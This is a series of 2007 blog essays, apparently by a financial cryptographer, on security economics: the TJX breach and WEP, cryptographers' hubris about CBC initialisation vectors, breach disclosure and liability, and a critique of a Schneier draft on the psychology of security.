    a. Notice how the crackers still went for the centralised database. Why? It is validated information, and is therefore much more valuable and economic. The gang was serious and methodical. They went for the databases.

    Conclusion: Eavesdropping isn't much of a threat to credit cards.

    b. Eavesdropping is a threat to passwords, assuming that is what they picked up. But, we knew that way back, and that exact threat is what inspired SSH: eavesdroppers sniffing for root passwords. It's also where SSL is most sensibly used.

    c. Eavesdropping is a threat, but MITM is not: by the looks of it, they simply sat there and sucked up lots of data, looking for the passwords. MITMs are just too hard to make them economic, *and* they leave tracks. "Who exactly is it that is broadcasting from that car over there....?"

    (For today's almost evidence of the threat of MITMs see the BBC!)

    d. Therefore, SSL v1 would have been sufficient to protect against this threat level. SSL v2 was overkill, and over-expensive: note how it wasn't deployed to protect the passwords from being eavesdropped. Neither was any other strong protocol. (Standard problem: most standardised security protocols are too heavy.)

    TJX and 45 million americans say "thanks, guys!" I reckon it is going to take the other 255 million americans to lose big time before this lesson is attended to.

    e. Why did they use a weak crypto protocol? Because it is the one delivered in the hardware.

    Question: Why is hardware often delivered with weak crypto?

    f. And, why was a weak crypto protocol chosen by the WEP people? And why are security observers skeptical that the new replacement for WEP will last any longer? The solution isn't in the "guild" approach I mentioned earlier, so forget ranting about how people should use a good security expert. It's in the institutional factors: security is inversely proportional to the number of designers. And anything designed by an industry cartel has a lot of designers.

    g. Even if they had used strong crypto, could the breach have happened? Yes, because the network was big and complex, and the hackers could have simply plugged into some place elsewhere. Check out the clue here:

    The hackers in Minnesota took advantage starting in July 2005. Though their identities aren't known, their operation has the hallmarks of gangs made up of Romanian hackers and members of Russian organized crime groups that also are suspected in at least two other U.S. cases over the past two years, security experts say. Investigators say these gangs are known for scoping out the least secure targets and being methodical in their intrusions, in contrast with hacker groups known in the trade as "Bonnie and Clydes" who often enter and exit quickly and clumsily, sometimes strewing clues behind them.

    Recall that transactions are naked and vulnerable . Because the data is seen in so many places, savvy FCers assume the transactions are visible by default, and thus vulnerable unless intrinsically protected.

    h. And, even if the entire network had been protected by some sort of overarching crypto protocol like WEP, the answer is to take over a device. Big stores means big networks means plenty of devices to take over.

    i. Which leaves end-to-end encryption. The only protection you can really count on is end-to-end. WEP, WPA and IPSec and other such infrastruction-level systems are only a hopeful answer to an easy question, end-to-end security protocols are the real answer to application level questions.

    (e.g., they could have used SSL for protecting the password access to the databases, end to end. But they didn't.)

    j. The other requirement is to make the data insensitive to breaches. That is, even if a crook gets all the packets, he can't do anything with them. Not naked, as it were. End-to-end encryption then becomes a privacy benefit, not a security necessity.

    However, to my knowledge, only Ricardo and AADS deliver this, and most other designers are still wallowing around in the mud of encrypted databases. A possible exception to this is the selective disclosure approach ... but for various business reasons that is even less likely to field than Ricardo and AADS were.

    k. Why don't we use more end-to-end encryption with naked transaction protocols? One reason is that they don't scale: we have to write one for each application. Another reason is that we've been taught not to by generations: "you should use a standard security product." ... as seen by TJX, who *did* use a standard security product.

    Conclusion: Security advice is "lowest common denominator" grade. The best advice is to use a standard product that is inapplicable to the problem area, and if that's the best advice, that also means there aren't enough FC-grade people to do better.

    l. "Oh, we didn't mean that one!" Yeah, right. Tell us how to tell? Better yet, tell the public how to tell. They are already being told to upgrade to WPA, as if improving 1% of their network from 20% security to 80% security is going to help.

    m. In short, people will seize on the encryption angle as the critical element. It isn't. If you are starting to get to the point of confusion due to the multiplying conflicts, silly advice, and sense of powerless the average manager has, you're starting to understand.

    This is messy stuff, and you can pretty much expect most people to not get it right. Unfortunately, most security people will get it wrong too in a mad search for the single most important mistake TJX made.

    The real errors are systemic: why are they storing SSNs anyway? Why are they using a single number for the credit card? Why are retail transactions so pervasively bound with identity, anyway? Why is it all delayed credit-based anyway?

    Posted by iang at 02:27 PM | Comments (4) | TrackBack

    April 29, 2007

    Dr Geer goes to Washington

    To round out this weekend's security hubris special, "Dr. Geer goes to Washington." To tell them how much trouble the net is in, seemingly. His points were 5-fold:

    Summary
    • We need a system of security metrics, and it is a research grade problem.
    • The demand for security expertise outstrips the supply,and it is a training problem and a recruitment problem.
    • What you cannot see is more important than what you can, and so the Congress must never mistake the absence of evidence for the evidence of absence, especially when it comes to information security.
    • Information sharing that matters does not and will not happen without research into technical guarantees of non-traceability.
    • Accountability is the idea whose time has come, but it has a terrible beauty.

    Yes to his points 1,3,4,5, and we should read them. Which leaves:

    Priority number two: The demand for security expertise outstrips the supply.

    Information security is perhaps the hardest technical field on the planet. Nothing is stable, surprise is constant, and all defenders work at a permanent, structural disadvantage compared to the attackers. Because the demands for expertise so outstrip the supply,the fraction of all practitioners who are charlatans is rising. Because the demands of expertise are so difficult, the training deficit is critical. We do not have the time to create, as if from scratch, all the skills required. We must steal them from other fields where parallel challenges exist. The reason cybersecurity is not worse is that a substantial majority of top security practitioners bring other skills into the field; in my own case, I am a biostatistician by training. Civil engineers, public health practitioners, actuaries, aircraft designers, lawyers, and on and on — they all have expertise we can use, and until we have a training regime sufficient to supply the unmet demand for security expertise we should be both grateful for the renaissance quality of the information security field and we should mine those other disciplines for everything we can steal. If you can help bring people into the field, especially from conversion, then please do so. In the meantime, do not believe all that you hear from so-called experts. Santayana had it right when he said that “Skepticism is the chastity of the intellect; it is shameful to give it up too soon, or to the first comer.”

    Well! An alternate but not radically diverging opinion.

    Thanks to Gunnar

    Posted by iang at 06:17 PM | Comments (1) | TrackBack

    Security Expertise from Cryptographers: the Signals of Hubris

    Over on the crypto forum, an old debate restarted where some poor schmuck made the mistake of asking why CBC mode should not have an IV of all zeros?

    For the humans out there, a "mode" is way of using a block cipher ("encrypts only a block") to encrypt a stream. CBC mode chains each block to each next block by feeding the results from the last to the next ("cipher-block-chaining"). But, we need an initial value (IV) to start the process. In the past, zeros were suggested as good enough.

    The problem surfaces that if you use the same starting key, and the user sends the same packet, then the encrypted results will be the same (a block cipher being deterministic, generally). So we use a different IV for every different use of the secret key, in order to cause different results, and hide the same packet being sent. (There are also some other difficulties, but these are not only much more subtle, they are beyond my ability to write about, so I'll skip past them blithely.)

    Back to the debate. Predictably, there was little controversy over the answer ("you can't do that!"), some controversy over the fuller answer (what to do), but also more controversy over the attitude. In short, the crypto community displayed what might be considered a severe case of hubris:

    "If you don't know, then you had better employ a security expert who does!"

    There are many problems with this. Here's some of them:

    1. At a guess, designing secure protocols is 50% business, 40% software, 10% crypto. So when you say "employ a security expert" we immediately have the problem that security is many disciplines. A security expert might know a lot about cryptography, or he might know very little. What we can't reasonably expect is that a security expert knows a lot about everything.

    We have to be cut some out, and as security -- the entire field -- only rarely and briefly depends on cryptography, it seems reasonable that your average security expert only knows the basics of cryptography.

    Adi Shamir said in his misconceptions in cryptography:

    By implementers: Cryptography solves everything, but:
    • only basic ideas are successfully deployed
    • only simple attacks are avoided
    • bad crypto can provide a false sense of security

    What then are the basics? Block ciphers are pretty basic. Understanding all the ins and outs of modes and IVs however is not. Where we draw the line is in knowing our own limitations, so therefore the original question ("what's wrong with IV of all zeros?") indicates quite good judgement.

    2. But what about software? We can see it in the cryptographers' view:

    "Just use a unique IV."

    Although this sounds simple, it is a lot harder to implement than to say, and the person who gets to be responsible for the reality is the programmer. In glorious, painful detail.

    Consider this: say you choose to put random numbers in the IV, and then you specify that the protocol must have a good RNG ("random number generator"). Then, how do you show that this is what actually happens? How can you show that the user's implementation has a good RNG? Big problem: you can't. And this has been an ignored problem for basically the entire history of Internet cryptography.

    Dilbert on Randomness

    This would suggest that if you are doing secure protocols, what you want is someone who knows more about software than cryptography, because you want to know the costs of those choices more than you want to know the snippety little details.

    3. Unfortunately, cryptography has captured the attention as a critical element of security. Software on the other hands is less interesting; just ask any journalist.

    Because of this, crypto has become a sort of rarified unchallengeable beast in technological society, an institution more displaying of religious beliefs than cold science. Mere software engineers can rarely debate the cryptographers as peers, even the most excellent ones (like Zooko, Hal Finney and Dani Nagy) who can seriously write the maths.

    So while I suggest that software is more important to the end result than cryptography, the programmers still lose in the face of assumed superiority. "Employ someone better than you" smacks of false professionalism, guildmaking. It's simple enough economics; if we as a group can create an ethos like the medical industry, where we could become unchallenged authorities, then we can lock out competitors (who haven't passed the guild exam), and raise prices.

    Unfortunately, this raises the chance to near certainty that we also lock out people who can point out when we are off the rails.

    4. And, we can forget about the business aspects completely. That is, a focus on requirements is just not plausible for people who've buried themselves in mathematics for a decade, as they don't understand where the requirements come from. Talking about risk is a vague hand-wavy subject, better left alone because of its lack of absolute provability.

    By way of example, one of the questions in the recent debate was

    "you haven't heard of anyone breaking SD cards have you?"

    From a business perspective this makes complete sense, it is a completely standard risk perspective with theory to back it up (albeit a simplification); from a cryptographer's perspective it is laughable.

    Who's right? Actually, both perspectives have merit, and choosing the right approach is again the subject of judgement.

    5. Hence, a strong knee-jerk tendency to fall-back to the old saws like the CIA of confidentiality, integrity and authentication. But, it is generally easy to show that CIA and similar things are nice for crypto school but a bad start in real life.

    E.g., in the above debate, it turns out that the application in question is DRM -- Digital Rights Management. What do we know about DRM?

    If anything has been learnt at massive cost over the last 10 years of failed efforts, it is that DRM security does not have to be strong. Rather it has to create a discrimination between those who will pay and those who won't. This is a pure business decision. And it totally blows away the C, confidentiality, in CIA.

    Don't believe me? Buy an iPod. The point here is that if one analyses the market for music (or ringtones, or cell phones, apparently) then the last thing one cares about is being able to crack the crypto. If one analyses the market for anything, CIA turns out to be such a gross simplification that you can pretty much assume it to be wrong from the start.

    6. If you've subscribed to the above, even partly, you might then be wondering how we can tell a good security expert from a bad one? Good question!

    Even I find it difficult, and I design the stuff (not at the most experienced level, but way more than for the hobby level). It is partly for that reason that I name financial cryptographers on the blog: to develop a theory of just how to do this.

    How is a manager who has no experience in this going to do pick from a room full of security experts, who mostly disagree with each other? Basically, you're stuffed, mate!

    So where does that leave us? Steve Bellovin says that when we hire a security expert, we are hiring his judgement, not his knowledge of crypto. Which means knowing when to worry, and especially _when not to worry_, and I fully agree with that! So how then do we determine someone's judgement in security matters?

    Here's a scratched-down emerging theory of signals of security judgement:

    BAD: If someone says "you need to hire a security expert, because you don't know enough, and that could be dangerous" that's a red-flag.

    GOOD: If they ask what the requirements are, that's good.

    BAD: If they assume CIA before the requirements, that's bad.

    GOOD: If they ask what the application is, then a big plus.

    BAD: If they say "use a standard protocol" then that's bad.

    GOOD: If they say "this standard protocol may be a good starting point" then that's good.

    BAD: If they know what goes wrong when an IV is not perfect, that's a danger sign.

    GOOD: If they know enough to say "we have to be careful of the IV" then that's good.

    BAD: If they don't know what risk is, they cannot reduce your risk.

    GOOD: If they know more software than crypto, that's golden.

    Strongly oriented to weeding out those who know too much about cryptography, it seems.

    Sadly, the dearth of security engineers who don't subscribe to the hubristic myths leaves us with an unfortunate result: the job is left up to you. This has been the prevalent result of so many successful Internet ventures that it is a surprise that it hasn't been more clear. I'm sufficiently convinced that I think it has reached the level of a Hypothesis:

    "It's your job. Do it."

    Hubris? Perhaps! It's certainly your choice to either do it yourself, or hand it over to a security expert, so let's hear your experiences!

    Posted by iang at 05:42 PM | Comments (2) | TrackBack

    April 27, 2007

    Breached *and* sued -- is TJX the tipping point to liability alignment?

    TJX is to be sued. The huge data breach by the US retailer is news covered elsewhere, as it is just a big one in a series of other like ones.

    The suit will argue that TJX failed to protect customer data with adequate security measures, and that the Framingham, Mass.-based retail giant was less than honest about how it handled data.

    What is interesting is that this could be the first time that someone big says "boo!" If the banks are now getting together to sue TJX for doing the wrong thing, this sets an interesting precedence: the banks say (presumably) that TJX was negligent and has done damages.

    If the courts can show this is worth remedy, then the reverse is possible too. There are other suits possible. If the banks lose the data, then maybe they should be sued? If Microsoft's OS is shown to be insecure and susceptible to lost data, then maybe it should be sued? Or the banks that quite happily permitted it to be used, again? If someone pushes a particular product for commercial purposes (such as a firewall, a secure token, an encryption protocol, or just advice...) and it is shown to be materially involved in a breach, maybe the pusher needs to be sued?

    What would this mean? A lot of suits, is one thing, such as is being readied against Paypal. A lot of money wasted, and the lawyers get richer. Some banks, some suppliers, some pushers and some users might modify their behaviour. Others might just get more defensive.

    That may be bad ... but what's our alternative?

    Suppliers and sellers of bad products have not been punished. Neither have buyers of bad products. Leaving aside the sense of blame and revenge, where is the feedback loop that tells a company that "buying that was wrong, that hurts?" Where is the message that says "you shouldn't use that software for online banking" to the user?

    To address this lack of feedback, lack of confirmed danger, many have suggested government action. But, other than the spectacular exception of the SB1386 data breach disclosure law, most government laws and interventions have made matters worse, not better.

    Economists like those going to WEIS2007 have suggested many things: Align the incentives, share more breach information amongst victims, make software vendors liable, etc etc. I suspect that one common rejoinder here is that the very economics that explains the problem often gives clues as to why it isn't solved.

    Some mad crypto people have even suggested designing security into the system in the first place. Yet other fruitcakes have said that designing the wrong security in was what got us to where we are now...

    What doesn't seem clear from an outside, global, society perspective is ... what to do?! None of those approaches are going to "just work," even if they are adopted.

    However, the liabilities (growing) and the interests (diverging) are going to be balanced and aligned, one way or another. The Internet security world today is out of balance, unsustainable in its posture.

    Here's my prediction: At some point we do reach a tipping point, and at that point the suits start.

    However, predicting re-balancing-by-suits has been a little like predicting the collapse of the dollar in the new not-quite-global-currency regime: when it did happen, we were caught by surprise. And then it bounced back again...

    So, no dates on that prediction. Let's watch for TJX copies.

    Posted by iang at 09:42 AM | Comments (2) | TrackBack

    April 19, 2007

    On cleaning up the security mess: escaping the self-perpetuating trap of Fraud?

    Two separate comments on the blog from a few days ago reach into the nub of the security mess. Adam comments:

    It's not that we're unable to propose solutions, it's that they're hard to compare. My assertion is that once we overcome the desire to hide our errors, we can learn to compare in better ways.

    And Lynn writes:

    Two separate studies recently reached conflicting conclusions: While one found that identity theft is on the rise significantly, the other reported that it is on the decline.

    So which is it?

    Addressing these in reverse order, we can expect two professionally-prepared scientific reports on the same subject to reach the same conclusion, unless there are some other factors involved.

    Firstly, it could be that we don't know enough (c.f., silver bullets). Secondly, it could be that we are not using scientific rigour, and the report is instead some for-profit advertisement. Or, thirdly, we could always simply be making a mistake.

    All reasons are plausible... but now look at Adam's comment. If we apparently have a desire to hide our errors, what does that say? Are we all snake-oil salesmen? Are we not scientists? Is security only sales and hype, and there no professionalism in the field at all?

    If we were talking about a science, and/or conducted by professionals, then we could assume that while Lynn's case was possible, it would be infrequent: professionals would not conclude if they did not know enough. Scientists wouldn't write for-profit advertisements, and although professionals might, they would be careful to disclose and disclaim. At the least, we would expose our data and ask for alternate analyses for the purpose of eliminating errors and mistakes.

    If we were scientists, we recognise that the goal is knowledge, and the elimination of our own mistakes is the only way to advance knowledge. Having any desire whatsoever to cover our mistakes is incompatible with scientific method, indeed, it should be a joy to uncover our mistakes, as this is the only way to advance! And, even professionals know that recognition and correction of mistakes is a core professional duty.

    This suggests then that security is not science and it is not a profession.

    Is security only the marketing of ephemeral goods and services?

    There is no moral difficulty in security being only, mere marketing. We humans have the right to make money, and spend it on what we like. If companies buy hype then let us sell them hype.

    However, even in marketing there are limits. Even in marketing, we say that statements must be true. Even in marketing, professionalism exists.

    Why is this? Perhaps it is time to consider a dramatic alternate to the true statement: Fraud.

    Under common law, three elements are required to prove fraud: a material false statement made with an intent to deceive (scienter), a victim’s reliance on the statement and damages.

    In today's Internet security world, we have damages, in Lynn's above-mentioned reports, whether up or down. We also have reliance by users on browsers, operating systems, CAs and server security. The intent to deceive is easy to show in the context of sales.

    Do we have material false statements?

    If the security industry was brought before the court of common law, I'd suggest that there's a pretty good chance that it would be found guilty of fraud!

    Which is why Adam's assertion is so pertinent. Once we have committed fraud, we have also committed to covering it up. Fraud practitioners know that a strong signal of fraud is hiding the results, a desire to hide errors.

    Fraud practitioners also know that fraud is a trap; once a small fraud is committed, we have to commit another and another, bigger and bigger. And each becomes easier, mentally speaking, than the first.

    The security industry is caught in the trap of fraud: we are perpetually paying for the material false statements of our past, with bigger and bigger frauds. Where does this end?

    Posted by iang at 07:39 AM | Comments (1) | TrackBack

    April 17, 2007

    Our security sucks. Why can't we change? What's wrong with us?

    Adam over at EC joined the fight against the disaster known as Internet Security and decided Choicepoint was his wagon. Mine was phishing, before it got boring.

    What is interesting is that Adam has now taken on the meta-question of why we didn't do a better job. Readers here will sympathise. Read his essay about how the need for change is painful, both directly and broadly:

    At a human level, change involves loss and and the new. When we lose something, we go through a process, which often includes of shock, anger, denial, bargaining and acceptance. The new often involves questions of trying to understand the new, understanding how we fit into it, if our skills and habits will adapt well or poorly, and if we will profit or lose from it.

    Adam closes with a plea for help on disclosure :

    I'm trying to draw out all of the reasons why people are opposed to change in disclosure habits, so we can overcome them.

    I am not exactly opposed but curious, as I see the issues differently. So in a sense, deferring for a moment a brief comment on the essay, here are a few comments on disclosure.

    1. Disclosure is something that is very hard to isolate. SB1386 was a big win, but it only covered the easy territory: you, bad company, know the victim's name, so tell them.
    2. Disclosure today doesn't cover what we might call secondary disclosure, which is what Adam is looking for. As discussed Schechter and Smith, and in my Market for Silver Bullets:

      Schechter & Smith use an approach of modelling risks and rewards from the attacker's point of view which further supports the utility of sharing information by victims:

      Sharing of information is also key to keeping marginal risk high. If the body of knowledge of each member of the defense grows with the number of targets attacked, so will the marginal risk of attack. If organizations do not share information, the body of knowledge of each one will be constant and will not affect marginal risk. Stuart E. Schechter and Michael D. Smith "How Much Security is Enough to Stop a Thief?", Financial Cryptography 2003 LNCS Springer-Verlag.

      Yet, to share raises costs for the sharer, and the benefits are not accrued to the sharer. This is a prisoner's dilemma for security, in that there may well be a higher payoff if all victims share their experiences, yet those that keep mum will benefit and not lose more from sharing. As all potential sharers are joined in an equilibrium of secrecy, little sharing of security information is seen, and this is rational. We return to this equilibrium later.

    3. Disclosure implies the company knows what happens. What if they don't?
    4. Disclosure assumes that the company will honestly report the full story. History says they won't.
    5. Disclosure of the full story is only ... part of the story. "We lost a laptop." So what? "Don't do that again..." is hardly a satisfactory, holistic or systemic response to the situation.

      (OK, so some explanation. At what point do we forget the nonsense touted in the press and move on to a real solution where the lost data doesn't mean a compromise? IOW, "we were given the task of securing all retail transactions......")

    So, while I think that there is a lot to be said about disclosure, I think it is also a limited story. I personally prefer some critical thought -- if I can propose half a dozen solutions to some poor schmuck company's problems, why can't they?

    And it is to that issue that Adam's essay really speaks. Why can't we change? What's wrong with us?

    Posted by iang at 03:42 PM | Comments (5) | TrackBack

    April 06, 2007

    What to do about responsible disclosure?

    A slight debate has erupted over Adam's presentation "Security Breaches are good for you" which makes it a success. Of course, Adam means good for the rest of us, not the victims. One can consider two classes of beneficiaries to breach information:

    1. The direct Individuals concerned. They can work out how their risks change from past events. In order for them to do anything to protect themselves, they have to be told; a company can't do it for them because it doesn't understand their situation.
    2. Companies that have similar setups. They can work out better how to defend against future events. This comes from both understanding the weaknesses and exploits, and also the risks and costs. This viewpoint is due to Stuart E. Schechter and Michael D. Smith, "How Much Security is Enough to Stop a Thief?", Financial Cryptography 2003, LNCS Springer-Verlag. At least that's where I first saw a rational explanation, even though I have been thinking about the "secrecy is bad for you" angle for many years.

    SB1386 and copies address the first case, but what about the second case? Kenneth F. Belva simply doesn't agree with it. He blogs that we can't release all this information for security reasons; we don't release security-sensitive info because it gives an attacker an advantage.

    This I claim is a facade. I believe that when people say "cannot release that for security sensitive reasons," there are generally other real reasons. Primarily, this is the safety of the people doing the job in that they can do their job much more happily if they can avoid the scrutiny that disclosure forces. Adam says (PDF):

    So, why can’t we share? There are four reasons usually given: liability, embarrassment, customers would flee, and we might lose our jobs.

    I quote Dan Geer as saying “No CSO on Wall Street has the authority to share even firewall logs because no General Counsel can see the point.”

    Beyond all the excuses, I think there is a much bigger danger: that security people can do their jobs much more badly when protected by secrecy. Disclosure forces all of us to defend our position and to be judged by our peers, and trotting out the "secrecy" argument is IMO almost always used to cover bad work, not a real security risk.

    That's not to say that any particular professional is bad, but that the profession as a whole, as a guild, promotes bad professional behaviour, behind the curtain of secrecy. That said, there is an element of truth in the issue. We don't disclose the root password, so where is the line drawn? Kenneth says:

    Just as we have and understanding of responsible disclosure now for technical information security vulnerabilities, we need the same for breach disclosure.

    If not through a centralized (not necessarily government) body Adam, what do you propose that would allow for better, more accurate and confidential disclosure that does not leak sensitive information?

    Disclosures are not possible if done via some "controlled" channel. As Adam points out and as economic theory has it (following Stigler), all closed channels become controlled, stifled and then neutered (and what happens after is sometimes even worse). This is as true in the infosec world as any other.

    So maybe we need a law to force public disclosure? Right?

    I call it wrong. SB1386 was a big win because it forced 1. above. This was in no small part because the issue was simple: just write to the victims and tell them what was lost. The harm was clear, the victims were directly known, and they just needed to be told.

    Part 2 is much harder. I doubt a law can do it, and I further doubt a law can do any good there at all. There is no victim being targetted, there is no simple harm, and there is indeed no direct or contractual relationship here at all.

    We simply have no guidance to make such a law. SB1386 was a lucky break, it spotted a precise niche, and filled it. We should *not* take SB1386 as anything but an extraordinarily lucky break, and we should not expect to repeat it.

    So where does that leave us with respect to responsible disclosure ? It will then fall to the companies to decide what to do ... and obviously it is far far safer to say nothing than say something. That doesn't make it right, just safer for those who's jobs are at risk.

    I talk about solutions in silver bullets. Adam dares:

    I am challenging everyone to face those fears, and work to overcome them. I believe that there's tremendous value waiting to be unlocked.

    Lack of solid info on breaches is one cause in what makes it so hard to defend against real risks; e.g., why phishing was able to develop unimpeded: nobody dared to talk about it when it happened to them, and anyone who did was poo-pooed by those who hadn't figured it out yet.

    (Quick quiz -- what's your defence against MITB? is it (a) never heard about it, in which case you are a victim of the secrecy myth, (b) have one but can't say, in which case you are perpetuating unsafety through secrecy, or (c) something else?)

    Posted by iang at 04:35 PM | Comments (5) | TrackBack

    March 10, 2007

    Feelings about Security

    In the ongoing saga of "what is security?" and more importantly, "why is it such a crock?" Bruce Schneier weighs in with some ruminations on "feelings" or perceptions, leading to an investigation of psychology.

    I think the perceptional face of security is a useful area to investigate, and the essay shines as a compendium of archtypical heuristics, backed up by experiments, and written for a security audience. These ideas can all be fed in to our security thinking, not to be taken for granted, but rather as potential explanations to be further tested. Recommended reading, albeit very long...

    I would however urge some caution. I claim that buyers and sellers do not know enough about security to make rational decisions, the essay suggests a perceptional deviation as a second uncertainty. Can we extrapolate strongly from these two biases?

    As it is a draft, requesting comment, here are three criticisms, which suggest that the introduction of essay seems unsustainable:

    THE PSYCHOLOGY OF SECURITY -- DRAFT

    Security is both a feeling and a reality. And they're not the same.

    The reality of security is mathematical, based on the probability of different risks and the effectiveness of different countermeasures.

    Firstly, I'd suggest that "what security is" is not yet well defined, and has defied our efforts to come to terms with it. I say a bit about that in Pareto-secure but I'm only really looking at one singular aspect of why cryptographers are so focussed on no-risk security.

    Secondly, both maths and feelings are approximations, not the reality. Maths is just another model, based on some numeric logic as opposed to intuition.

    What one could better say is that security can be viewed through a perceptional lens, and it can be viewed through a mathematical lens, and we can probably show that the two views look entirely different. Why is this?

    Neither is reality though, as both take limited facts and interpolate a rough approximation, and until we can define security, we can't even begin to understand how far from the true picture we are.

    We can calculate how secure your home is from burglary, based on such factors as the crime rate in the neighborhood you live in and your door-locking habits. We can calculate how likely it is for you to be murdered, either on the streets by a stranger or in your home by a family member. Or how likely you are to be the victim of identity theft. Given a large enough set of statistics on criminal acts, it's not even hard; insurance companies do it all the time.

    Thirdly, insurance is sold, not bought. Actuarial calculations do not measure security to the user but instead estimate risk and cost to the insurer, or more pertinently, insurer's profit. Yes, the approximation gets better for large numbers, but it is still an approximation of the very limited metric of profitability -- a single number -- not the reality of security.

    What's more, these calculations cannot be used to measure security. The insurance company is very confident in its actuarial calculations because it is focussed on profit; for the purpose of this one result, large sets of statistics work fine, as well as large margins (life insurance can pay out 50% to the sales agent...).

    In contrast, security -- as the victim sees it -- is far harder to work out. Even if we stick to the mathematical treatment, risks and losses include factors that aren't amenable to measurement, nor accurate dollar figures. E.g., if an individual is a member of the local hard drugs distribution chain, not only might his risks go up, and his losses down (life expectancy is generally lowered in that profession) but also, how would we find out when and how to introduce this skewed factor into his security measurement?

    While we can show that people can be sold insurance and security products, we can also show that the security they gain from those products has no particular closeness to the losses they incur (if it was close, then there would be more "insurance jobs").

    We can also calculate how much more secure a burglar alarm will make your home, or how well a credit freeze will protect you from identity theft. Again, given enough data, it's easy.

    It's easy to calculate some upper and lower bounds for a product, but again these calculations are strictly limited to the purpose of actuarial cover, or insurer's profit.

    They say little about the security of the user, and they probably play as much to the feelings of buyer as any mathematical model of seller's risks and losses.

    It's my contention that these irrational trade-offs can be explained by psychology.

    I think that's a tough call, on several levels. Here's some contrary plays:

    • Peer pressure explains a lot, and while that might feel like psychology; I'd suggest it is simple game theory.
    • Ignorance is a big factor (c.f., insufficient information theory).
    • Fear of being blamed also plays its part, which is more about agent/principal theory and incentives. It may matter less whether you judge the risk well than if you lose your job!
    • Transaction cost economics (c.f., Coase, Williamson) has a lot to say about some of the experiments (footnotes 16,17,51,52).
    • Marketing feeds into security, although perhaps marketing simply uses psychology -- and other tools -- to do its deeds.

    If we put all those things together, a complex pattern emerges. I look at a lot of these elements in the market for silver bullets, and, leaning heavily on the Spencarian theory of symmetrically insufficient information, I show that best practices may emerge naturally as a response to costs of public exposure, and not the needs for security. Some of the experiments listed (24,38) may actually augment that pattern, but I wouldn't go so far as to say that the heuristics described are the dominating factor.

    Still, in conclusion, irrationality is a sort of code word in economics for "our models don't explain it, yet." I've read the (original) literature of insufficient information (Spence, Akerlof, etc) and found a lot of good explanations. Psychology is probably an equally rewarding place to look, and I found the rest of the article very interesting.

    Posted by iang at 12:20 PM | Comments (7) | TrackBack

    February 10, 2007

    On starting afresh with Security...

    The gut-wrenching fight with who we want to be continues over at Mozilla. In a status update, Mitchell posts on the evolving Principles:

    SPECIFICITY: There were a set of comments about the Manifeto not being specific, either about the nature of the goal or the steps we might take to get there. This was intentional on my part. With regard to specificity of the goals, I’m not sure we know now. And I’m pretty sure that interpretations will change. For example, what does security mean? We know it means security vulnerabilities -- problems with code that allow malicious actors too much room to move. More recently, “phishing” has become a serious problem. It’s not a classic code vulnerability though, so any definition of security that focused solely on code would be too limited. There will undoubtedly be other types of problems that will come up. So if we try to define “security” today it may be incomplete and it will undoubtedly be incomplete in the future.

    My hope is that the Manifesto sets a stake in the ground that the broad topic of security is fundamental. Then a variety of groups can engage in more detailed discussions of what this means for them and what steps they will take. The Mozilla Foundation will clearly focus on products, technology and user interaction. Other groups can set out other specific tasks that contribute to improved Internet security.

    That's just what I wanted to say ...

    The recognition that security has failed has tracked the rise of phishing, growing through the years 2003-2004, but has been reinforced by data breaches, DDOS, botnets, etc. Those who saw the widening dichotomy between actual breaches and peacock strutting of the security industry started to ask questions. Is there one security or two? Is it possible to be secure and and not secure at the same time? Is there any point in talking about security at all, or is it all risk management? Who should we be securing, and what are we paying for?

    Certainly, the discussion can only start with a fairly brave admission: We certainly stuffed that up, didn't we! Until we get over that barrier, until we recognise the awful gut-twisting fact that as a discipline, we said we could do it and we didn't, we won't ever be able to address the problems.

    Mozilla makes the point above; has your organisation declared the failure insecurity to the public lately?

    Posted by iang at 08:46 AM | Comments (1) | TrackBack

    February 01, 2007

    EV - what was the reason, again?

    A debate is bubbling over in securityland about the (shock, horror) service of typing in your SSN to get a seen-in-the-wild check. You can try yourself

    I tried typing in 123 456 789 and it told me to p**s off ... drats, it's clever!

    But meanwhile, I spotted down at the bottom that there is a "Verisign secured" seal at the bottom. Oh, that means something, doesn't it? So I clicked it. It took me to Verisign. (Don't believe me ... click on the seal yourself ... PLEASE... and spot the <ahem> slight flaw :)

    But anyways, ==> Verisign <== then says:

    1/2/2007 23:02 www.stolenidsearch.com uses VeriSign services as follows:

    SITE NAME: www.stolenidsearch.com

    SSL CERTIFICATE
    STATUS: Valid (13-Jan-2007 to 13-Jan-2008)

    COMPANY/
    ORGANIZATION: TRUSTEDID INC
    Redwood City
    California, US

    Encrypted Data Transmission This Web site can secure your private information using a VeriSign SSL Certificate. Information exchanged with any address beginning with https is encrypted using SSL before transmission.
    Identity Verified TRUSTEDID INC has been verified as the owner or operator of the Web site located at www.stolenidsearch.com. Official records confirm TRUSTEDID INC as a valid business.

    For your best security while visiting sites, always make sure the address of the visited site matches the address you are expecting to see. Make sure that the URL of this page begins with "https://seal.verisign.com"
    >>REPORT SEAL MISUSE

    (highlighting the interesting bit there ...)

    So, there we have it. Verisign says that TrustedId Inc, d.b.a. "StolenIdSearch" are a valid business. If they misuse your SSN, go after them.

    What was the need for EV then, again?

    Addendum: The site responds to criticism.

    Posted by iang at 05:12 PM | Comments (7) | TrackBack

    January 13, 2007

    More on why Security isn't working -- it's in your Brain?

    The push to rethink security is gaining momentum. Last week I posted the abstract of pending keynote from FC2007, which commented on the desire to let the bad guys direct your security thinking. This week, I see a curious remark concerning Bruce Schneier in a DDJ article, who's been seen more and more around the economics circles:

    His latest work is on brain heuristics and perceptions of security, and he'll be doing a presentation on that topic at the RSA Conference next month. "I'm looking at the differences between the feeling and reality of security," he says. "I want to talk about why our perceptions of risk don't match reality, and there's a lot of brain science that can help explain this."

    I await with interest, because although I am skeptical, I find I can't dismiss it and it is a new direction that at the least may make us think about the possibilities. There is some support for this from the economics of irrationality, an emerging view in economics that suggests that rationality has been overdone, and irrationality, somtimes a.k.a. emotions, plays more of a part than we think. From the Economist report on tests of price versus product decision making:

    The researchers found that different parts of the brain were involved at different stages of the test. The nucleus accumbens-known from previous experiments to be involved in processing rewarding stimuli such as food, recreational drugs and monetary gain, as well as in the anticipation of those rewards-was the most active part when a product was being displayed. Moreover, the level of its activity correlated with the reported desirability of the product in question.

    When the price appeared, however, fMRI reported more activity in other parts of the brain. Excessively high prices increased activity in the insular cortex, a brain region linked to expectations of pain, monetary loss and the viewing of upsetting pictures. The researchers also found greater activity in this region of the brain when the subject decided not to purchase an item.

